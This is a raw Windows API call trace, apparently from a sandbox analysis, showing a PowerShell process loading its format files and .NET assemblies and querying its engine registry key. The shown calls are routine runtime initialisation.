	[0430.466] ReadFile (in: hFile=0x320, lpBuffer=0x3469be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3469be8*, lpNumberOfBytesRead=0x24cf98*=0xaca, lpOverlapped=0x0) returned 1
	[0430.466] ReadFile (in: hFile=0x320, lpBuffer=0x346921a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x346921a*, lpNumberOfBytesRead=0x24cf98*=0x0, lpOverlapped=0x0) returned 1
	[0430.466] ReadFile (in: hFile=0x320, lpBuffer=0x3469be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3469be8*, lpNumberOfBytesRead=0x24cf98*=0x0, lpOverlapped=0x0) returned 1
	[0430.466] CloseHandle (hObject=0x320) returned 1
	[0430.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.466] SetErrorMode (uMode=0x1) returned 0x1
	[0430.466] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cf40 | out: lpFileInformation=0x24cf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0430.467] SetErrorMode (uMode=0x1) returned 0x1
	[0430.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.467] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d028 | out: phkResult=0x24d028*=0x320) returned 0x0
	[0430.467] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cfac, lpData=0x0, lpcbData=0x24cfa8*=0x0 | out: lpType=0x24cfac*=0x1, lpData=0x0, lpcbData=0x24cfa8*=0x56) returned 0x0
	[0430.467] CoTaskMemAlloc (cb=0x5a) returned 0x48e6e0
	[0430.467] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cf7c, lpData=0x48e6e0, lpcbData=0x24cf78*=0x56 | out: lpType=0x24cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cf78*=0x56) returned 0x0
	[0430.467] CoTaskMemFree (pv=0x48e6e0) 
	[0430.467] RegCloseKey (hKey=0x320) returned 0x0
	[0430.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x24c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0430.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0430.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x24c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0430.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0430.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x24c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0430.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x24c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0430.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0430.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x24c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0430.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0430.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0430.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0430.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x24c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0430.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x24c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0430.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x24c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0430.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x24c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0430.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0430.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x24c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0430.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.591] VirtualQuery (in: lpAddress=0x24bac0, lpBuffer=0x24c980, dwLength=0x30 | out: lpBuffer=0x24c980*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.592] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xb6dd75d9, Data2=0x59fa, Data3=0x4ddb, Data4=([0]=0x95, [1]=0xeb, [2]=0xd6, [3]=0x6c, [4]=0x57, [5]=0xe2, [6]=0x56, [7]=0x5))) returned 0x0
	[0430.592] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x69b3a6bd, Data2=0x478, Data3=0x4cd4, Data4=([0]=0xa4, [1]=0x84, [2]=0x65, [3]=0xe8, [4]=0x13, [5]=0x76, [6]=0xba, [7]=0x48))) returned 0x0
	[0430.592] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.593] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.594] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x1cf5b1d5, Data2=0xaffc, Data3=0x4ebf, Data4=([0]=0x9f, [1]=0x8e, [2]=0x38, [3]=0x9c, [4]=0x78, [5]=0x7e, [6]=0x50, [7]=0x67))) returned 0x0
	[0430.594] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x1b05f333, Data2=0xc280, Data3=0x4b90, Data4=([0]=0xbb, [1]=0x1b, [2]=0xe, [3]=0x82, [4]=0xa1, [5]=0x57, [6]=0xa, [7]=0xc9))) returned 0x0
	[0430.594] VirtualQuery (in: lpAddress=0x24bec0, lpBuffer=0x24cd80, dwLength=0x30 | out: lpBuffer=0x24cd80*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.595] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.596] VirtualQuery (in: lpAddress=0x24bc00, lpBuffer=0x24cac0, dwLength=0x30 | out: lpBuffer=0x24cac0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.596] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xc7daacf, Data2=0x735b, Data3=0x45e2, Data4=([0]=0x8b, [1]=0x35, [2]=0x2c, [3]=0xa7, [4]=0x48, [5]=0x8e, [6]=0x1d, [7]=0x31))) returned 0x0
	[0430.597] VirtualQuery (in: lpAddress=0x24bec0, lpBuffer=0x24cd80, dwLength=0x30 | out: lpBuffer=0x24cd80*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.597] VirtualQuery (in: lpAddress=0x24bce0, lpBuffer=0x24cba0, dwLength=0x30 | out: lpBuffer=0x24cba0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.598] VirtualQuery (in: lpAddress=0x24b530, lpBuffer=0x24c3f0, dwLength=0x30 | out: lpBuffer=0x24c3f0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.598] VirtualQuery (in: lpAddress=0x24b530, lpBuffer=0x24c3f0, dwLength=0x30 | out: lpBuffer=0x24c3f0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.599] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xaad573a3, Data2=0xcd11, Data3=0x4fb3, Data4=([0]=0x95, [1]=0x28, [2]=0x33, [3]=0xd3, [4]=0x68, [5]=0x18, [6]=0xcf, [7]=0xaf))) returned 0x0
	[0430.599] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xebd07f59, Data2=0xb97, Data3=0x49fa, Data4=([0]=0x96, [1]=0x8e, [2]=0xf1, [3]=0x58, [4]=0xd0, [5]=0x52, [6]=0x85, [7]=0xd1))) returned 0x0
	[0430.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.599] SetErrorMode (uMode=0x1) returned 0x1
	[0430.599] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0430.599] GetFileType (hFile=0x320) returned 0x1
	[0430.600] SetErrorMode (uMode=0x1) returned 0x1
	[0430.600] GetFileType (hFile=0x320) returned 0x1
	[0430.600] ReadFile (in: hFile=0x320, lpBuffer=0x351c098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351c098*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.600] ReadFile (in: hFile=0x320, lpBuffer=0x351c098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351c098*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.601] ReadFile (in: hFile=0x320, lpBuffer=0x351c098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351c098*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.601] ReadFile (in: hFile=0x320, lpBuffer=0x351c098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351c098*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.601] ReadFile (in: hFile=0x320, lpBuffer=0x351c098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351c098*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.601] ReadFile (in: hFile=0x320, lpBuffer=0x351c098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351c098*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.601] ReadFile (in: hFile=0x320, lpBuffer=0x351c098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351c098*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.601] ReadFile (in: hFile=0x320, lpBuffer=0x351c098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351c098*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.602] ReadFile (in: hFile=0x320, lpBuffer=0x351c098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351c098*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.602] ReadFile (in: hFile=0x320, lpBuffer=0x351c098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351c098*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.602] ReadFile (in: hFile=0x320, lpBuffer=0x351c098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351c098*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.602] ReadFile (in: hFile=0x320, lpBuffer=0x351c098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351c098*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.602] ReadFile (in: hFile=0x320, lpBuffer=0x351c098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351c098*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.602] ReadFile (in: hFile=0x320, lpBuffer=0x351c098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351c098*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.602] ReadFile (in: hFile=0x320, lpBuffer=0x351c098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351c098*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.603] ReadFile (in: hFile=0x320, lpBuffer=0x351c098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351c098*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.603] ReadFile (in: hFile=0x320, lpBuffer=0x351c098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351c098*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.603] ReadFile (in: hFile=0x320, lpBuffer=0x351c098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351c098*, lpNumberOfBytesRead=0x24cf98*=0xbce, lpOverlapped=0x0) returned 1
	[0430.603] ReadFile (in: hFile=0x320, lpBuffer=0x351b7ce, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351b7ce*, lpNumberOfBytesRead=0x24cf98*=0x0, lpOverlapped=0x0) returned 1
	[0430.603] ReadFile (in: hFile=0x320, lpBuffer=0x351c098, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x351c098*, lpNumberOfBytesRead=0x24cf98*=0x0, lpOverlapped=0x0) returned 1
	[0430.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.604] SetErrorMode (uMode=0x1) returned 0x1
	[0430.604] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cf40 | out: lpFileInformation=0x24cf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0430.604] SetErrorMode (uMode=0x1) returned 0x1
	[0430.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.604] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d028 | out: phkResult=0x24d028*=0x320) returned 0x0
	[0430.604] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cfac, lpData=0x0, lpcbData=0x24cfa8*=0x0 | out: lpType=0x24cfac*=0x1, lpData=0x0, lpcbData=0x24cfa8*=0x56) returned 0x0
	[0430.604] CoTaskMemAlloc (cb=0x5a) returned 0x48e830
	[0430.604] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cf7c, lpData=0x48e830, lpcbData=0x24cf78*=0x56 | out: lpType=0x24cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cf78*=0x56) returned 0x0
	[0430.604] CoTaskMemFree (pv=0x48e830) 
	[0430.604] RegCloseKey (hKey=0x320) returned 0x0
